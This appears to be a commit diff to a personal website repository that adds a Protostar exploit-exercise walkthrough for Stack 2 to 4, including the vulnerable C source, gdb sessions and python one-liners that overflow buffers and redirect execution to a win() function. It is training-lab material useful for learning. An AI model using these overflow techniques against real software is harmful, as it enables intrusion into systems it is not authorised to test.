pew
/
paulwalko.github.io
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

protostar update

master
Paul Walko 2016-06-19 02:39:15 -04:00
parent c77d375000
commit 55a8e2b3ed
11 changed files with 535 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
Walko_Paul-Resume.pdf
View File

Binary file not shown.

218
_posts/2016-06-14-nebula_exploit_exercises.md
View File

@ -1,11 +1,13 @@
---
title: "Protostar Exploit Exercises Solutions 0-1"
title: "Protostar Exploit Exercises Solutions 0-4"
layout: post
category: writeup
tags: [exploit-exercises, protostar, hacking]
excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com"
---
Note: When you first logon to protostar, make sure you are actually using bash. It will make things a lot easier.
# Stack 0
Here's what we're given:
@ -97,3 +99,217 @@ you have correctly got the variable to the right value
```
Woo!
# Stack 2
The website says this one involves environment variables, and how they can be set, so let's look at the code:
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
```
There's the ```char buffer[64]``` and ```char *variable``` again, then shortly after that it reads in the ```GREENIE``` environmental variable. Since ```GREENIE``` is copied to ```buffer```, let's see if appending ```0x0d0a0d0a``` to the end of some 64 bit string, since that's what it compares in the if statement:
```
user@protostar:/opt/protostar/bin$ export GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable
```
# Stack 3
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
```
It looks like I need to input a 64 byte buffer like previously, and then append the address of ```win()```, which will write to ```fp```.
First to figure out the address of win I ran ```objdump -d stack3 | grep win``` which outputs ```08048424```:
```
user@protostar:/opt/protostar/bin$ objdump -d stack3 | grep win
08048424 <win>:
```
And appending it to the buffer:
```
user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*64 + "\x24\x84\x04\x08"'` | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
```
# Stack 4
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
```
This is similar to Stack 3, except it I need to add some extra padding to get to ```win```.
First I'm going to get the memory address of ```win```, but I won't use this till the end:
```
user@protostar:/opt/protostar/bin$ objdump -d stack4 | grep win
080483f4 <win>:
```
Now to figure out the padding, I ran gdb with and used binary search to figure out what the max buffer is:
First with predefined buffers of 50 and 100:
```
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r // with 50
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r // with 100
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r // with ~75
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r //with ~80
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
```
And now I figured out it's somewhere around 80 by approximation, so I guessed than then 75, then 76:
```
user@protostar:/opt/protostar/bin$ gdb ./stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r // with 80
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r // with 75
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r // with 76
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at libc-start.c:187
187 libc-start.c: No such file or directory.
in libc-start.c
(gdb) Woo => 76
```
Alright, so I know the buffer I need is 76, and the memory address of ```win```:
```
user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*76 + "\xf4\x83\x04\x08"'` | ./stack4
code flow successfully changed
```
There you go.
# Stack 5
Finally, we get to do some shellcode!
I have a good idea about how to do this, but unfortunately I can't get something to work right, so I'll update this as soon as I do.

18
_site/404.html
View File

@ -5,11 +5,22 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
<!--<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<!--
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
-->
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>

BIN
_site/Walko_Paul-Resume.pdf
View File

Binary file not shown.

20
_site/about/index.html
View File

@ -5,11 +5,22 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
<!--<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<!--
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
-->
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
@ -168,7 +180,7 @@
<section id="action">
<h2></small>Contact Me</small></h2>
<a href="http://localhost:4000/resume">View my resume</a>
<a href="http://localhost:4000/Walko_Paul-Resume.pdf">View my resume</a>
<span> or </span>
<a href="mailto:paulsw.pw@gmail.com">e-mail me</a>
</section>

20
_site/category/index.html
View File

@ -5,11 +5,22 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
<!--<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<!--
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
-->
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
@ -148,7 +160,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>

20
_site/index.html
View File

@ -5,11 +5,22 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
<!--<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<!--
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
-->
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
@ -116,7 +128,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>

2
_site/sitemap.txt
View File

@ -1,4 +1,4 @@
https://paul.walko.org//writeup/nebula_exploit_exercises
http://paul.walko.org//writeup/nebula_exploit_exercises

4
_site/sitemap.xml
View File

@ -5,8 +5,8 @@
http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">
<url>
<loc>https://paul.walko.org//writeup/nebula_exploit_exercises</loc>
<lastmod>2016-06-15T01:37:41-04:00</lastmod>
<loc>http://paul.walko.org//writeup/nebula_exploit_exercises</loc>
<lastmod>2016-06-19T02:35:49-04:00</lastmod>
<changefreq>weekly</changefreq>
</url>

24
_site/tag/index.html
View File

@ -5,11 +5,22 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
<!--<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Paul Walko's personal website">
@ -41,8 +52,9 @@
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<!--
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
-->
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -75,7 +87,7 @@
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
@ -167,7 +179,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>
@ -235,7 +247,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>
@ -299,7 +311,7 @@
</div>
<div class="col-lg-10 col-md-10 col-sm-10">
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-1</a></h2>
<h2 class="title"><a href="/writeup/nebula_exploit_exercises">Protostar Exploit Exercises Solutions 0-4</a></h2>
<ul class="tags">
<li><i class="fa fa-tag"> exploit-exercises</i></li>

240
_site/writeup/nebula_exploit_exercises.html
View File

@ -5,16 +5,27 @@
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
<!--<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
-->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
<title>Protostar Exploit Exercises Solutions 0-1</title>
<title>Protostar Exploit Exercises Solutions 0-4</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
@ -41,8 +52,9 @@
<script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
<!--
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
-->
<!--[if lt IE 9]>
<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
@ -79,7 +91,7 @@
</ul>
</li>
<li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/resume">RÉSUMÉ</a></li>
<li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
@ -109,7 +121,7 @@
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-1</p>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-4</p>
<ul class="tags clearfix">
@ -125,7 +137,9 @@
</header>
<h1 id="stack-0">Stack 0</h1>
<p>Note: When you first logon to protostar, make sure you are actually using bash. It will make things a lot easier.</p>
<h1 id="stack-0">Stack 0</h1>
<p>Heres what were given:</p>
@ -215,6 +229,220 @@ you have correctly got the variable to the right value
<p>Woo!</p>
<h1 id="stack-2">Stack 2</h1>
<p>The website says this one involves environment variables, and how they can be set, so lets look at the code:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");
}
modified = 0;
strcpy(buffer, variable);
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
</code></pre>
</div>
<p>Theres the <code class="highlighter-rouge">char buffer[64]</code> and <code class="highlighter-rouge">char *variable</code> again, then shortly after that it reads in the <code class="highlighter-rouge">GREENIE</code> environmental variable. Since <code class="highlighter-rouge">GREENIE</code> is copied to <code class="highlighter-rouge">buffer</code>, lets see if appending <code class="highlighter-rouge">0x0d0a0d0a</code> to the end of some 64 bit string, since thats what it compares in the if statement:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ export GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable
</code></pre>
</div>
<h1 id="stack-3">Stack 3</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
volatile int (*fp)();
char buffer[64];
fp = 0;
gets(buffer);
if(fp) {
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();
}
}
</code></pre>
</div>
<p>It looks like I need to input a 64 byte buffer like previously, and then append the address of <code class="highlighter-rouge">win()</code>, which will write to <code class="highlighter-rouge">fp</code>.</p>
<p>First to figure out the address of win I ran <code class="highlighter-rouge">objdump -d stack3 | grep win</code> which outputs <code class="highlighter-rouge">08048424</code>:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack3 | grep win
08048424 &lt;win&gt;:
</code></pre>
</div>
<p>And appending it to the buffer:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*64 + "\x24\x84\x04\x08"'` | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
</code></pre>
</div>
<h1 id="stack-4">Stack 4</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
</code></pre>
</div>
<p>This is similar to Stack 3, except it I need to add some extra padding to get to <code class="highlighter-rouge">win</code>.</p>
<p>First Im going to get the memory address of <code class="highlighter-rouge">win</code>, but I wont use this till the end:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack4 | grep win
080483f4 &lt;win&gt;:
</code></pre>
</div>
<p>Now to figure out the padding, I ran gdb with and used binary search to figure out what the max buffer is:</p>
<p>First with predefined buffers of 50 and 100:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
&lt;http://www.gnu.org/software/gdb/bugs/&gt;...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r // with 50
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r // with 100
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r // with ~75
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r //with ~80
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
</code></pre>
</div>
<p>And now I figured out its somewhere around 80 by approximation, so I guessed than then 75, then 76:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ gdb ./stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
&lt;http://www.gnu.org/software/gdb/bugs/&gt;...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r // with 80
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r // with 75
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r // with 76
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at libc-start.c:187
187 libc-start.c: No such file or directory.
in libc-start.c
(gdb) Woo =&gt; 76
</code></pre>
</div>
<p>Alright, so I know the buffer I need is 76, and the memory address of <code class="highlighter-rouge">win</code>:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*76 + "\xf4\x83\x04\x08"'` | ./stack4
code flow successfully changed
</code></pre>
</div>
<p>There you go.</p>
<h1 id="stack-5">Stack 5</h1>
<p>Finally, we get to do some shellcode!</p>
<p>I have a good idea about how to do this, but unfortunately I cant get something to work right, so Ill update this as soon as I do.</p>
</div>
<div id="markdown-outline" class="col-lg-3">